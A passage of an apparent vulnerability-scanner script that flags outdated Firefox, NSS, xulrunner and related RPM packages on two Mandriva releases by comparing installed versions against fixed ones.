rpm:\"lib64nss-static-devel~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ka\", rpm:\"firefox-ka~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ku\", rpm:\"firefox-ku~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-oc\", rpm:\"firefox-oc~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sr\", rpm:\"firefox-sr~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda\", rpm:\"gnome-python-gda~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda-devel\", rpm:\"gnome-python-gda-devel~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gdl\", rpm:\"gnome-python-gdl~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkhtml2\", rpm:\"gnome-python-gtkhtml2~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkmozembed\", rpm:\"gnome-python-gtkmozembed~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkspell\", rpm:\"gnome-python-gtkspell~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.27\", rpm:\"libxulrunner1.9.2.27~1.9.2.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts\", rpm:\"rootcerts~20120218.00~1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts-java\", rpm:\"rootcerts-java~20120218.00~1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.24.0~3.37mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.27\", rpm:\"lib64xulrunner1.9.2.27~1.9.2.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ast\", rpm:\"firefox-ast~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn_BD\", rpm:\"firefox-bn_BD~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn_IN\", rpm:\"firefox-bn_IN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-br\", rpm:\"firefox-br~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bs\", rpm:\"firefox-bs~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_ZA\", rpm:\"firefox-en_ZA~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_CL\", rpm:\"firefox-es_CL~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_MX\", rpm:\"firefox-es_MX~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fa\", rpm:\"firefox-fa~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gd\", rpm:\"firefox-gd~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hr\", rpm:\"firefox-hr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hy\", rpm:\"firefox-hy~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kk\", rpm:\"firefox-kk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ku\", rpm:\"firefox-ku~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lg\", rpm:\"firefox-lg~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 